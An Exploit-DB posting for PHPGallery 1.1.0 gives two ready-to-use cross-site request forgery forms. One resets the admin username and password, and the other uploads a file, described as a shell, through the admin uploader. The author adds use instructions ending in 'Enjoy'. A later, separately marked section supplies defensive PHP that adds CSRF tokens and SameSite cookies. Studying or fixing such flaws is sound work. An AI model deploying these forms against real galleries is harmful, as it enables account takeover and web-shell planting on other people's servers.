PHPGallery 1.1.0 – Cross-Site Request Forgery

  • Author: Or4nG.M4N
    Date: 2010-11-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15573/
  • -------------------------------------------------------------------------
    # Software: phpgallery v 1.1.0: 
    # Author: Or4nG.M4N 
    # Date: n/a
    # Dork: Forbidden 
    # Software Link: http://www.hotscripts.com/listing/phpgallery/:
    -------------------------------------------------------------------------
    +---+[REMOTE CSRF Change Admin Password by OR4NG.M4N]+---+
    <html> 
    <head> 
    <title>REMOTE CSRF Change Admin Password by OR4NG.M4N</title> 
    </head> 
    <body> 
    <form action="http://domain/[pwd]/admin/do_change_info.php" method="post"> 
    <br> 
    <input name="username" id="username" type="text" value="Or4nG" > 
    <br> 
    <input name="password" id="password" type="password" value="Ro0t" >
    <br> 
    <input name="submit" onclick="MM_validateForm('username','','R','password','','R');return document.MM_returnValue" value="Submit" type="submit">
    </form> 
    </body> 
    </html> 
    
    How to use: copy this code, save it in a file csrf.html, and open it. Enjoy
    
    
    +---+[REMOTE CSRF upload ShElL by OR4NG.M4N]+---+ 
    <html> 
    <head> 
    <title>REMOTE CSRF upload ShElL by OR4NG.M4N</title> 
    </head> 
    <body>
    <form enctype="multipart/form-data" action="http://domain/[pwd]/admin/uploader.php" method="POST">
    Choose a file to upload to the gallery:<br>
    <input name="uploadedfile" type="file" />
    <p align="left">Picture Caption:<br> 
    <input name="caption" type="text" id="caption" size="45">
    <p align="left"> 
    <input name="Submit" type="submit" id="Submit" onClick="MM_showHideLayers('loading','','show')" value="Upload File" />
    </form> 
    </body> 
    </html> 
    
    How to use: copy this code, save it in a file csrf.html, and open it. Enjoy
    
    --------------------------------------------------------
    # Email - priv8te@hotmail.com
    # GreeTz 2 - i-Hmx - Demetre - SadhacKer - The injector ]
    # P0c TeaM - SarBoT511 - YoU - RGH - MY ]
    # Home - www.v4-team.com - p0c.cc - inj3ct0r.com ]
    ---------------------------------------------------------
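
Both forms above are cross-site POSTs to admin/do_change_info.php and admin/uploader.php, which the advisory reports as accepted without any proof that the request came from the gallery's own admin pages. The following is an added example, not PHPGallery code and not part of the original advisory, of a session-bound token check those handlers could require; the helper names, the csrf_token field and the assumption that the admin area uses PHP sessions are hypothetical.

```php
<?php
// Added example, not PHPGallery code. Assumes the admin area uses PHP
// sessions; needs PHP >= 7.3 for the array form of session_set_cookie_params.
declare(strict_types=1);

// Hypothetical helper: start the session with a cookie that browsers do not
// attach to cross-site requests (SameSite), as defence in depth.
function start_admin_session(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
        session_start();
    }
}

// Issue (or reuse) a per-session random token for every admin form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to print inside the password-change and upload forms.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Reject any state-changing request that does not carry the session's token.
// A page on another origin cannot read the token, so a forged form fails here.
function require_csrf_token(): void
{
    $sent     = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST'
        || !is_string($sent) || $expected === ''
        || !hash_equals($expected, $sent)) {   // constant-time comparison
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}

// Assumed placement, first lines of admin/do_change_info.php and
// admin/uploader.php, before any credential change or file write:
//   start_admin_session();
//   require_csrf_token();
```

The legitimate admin forms would print csrf_field() inside their form element. Requiring the current password on the password-change form gives a second check that a forged request cannot satisfy.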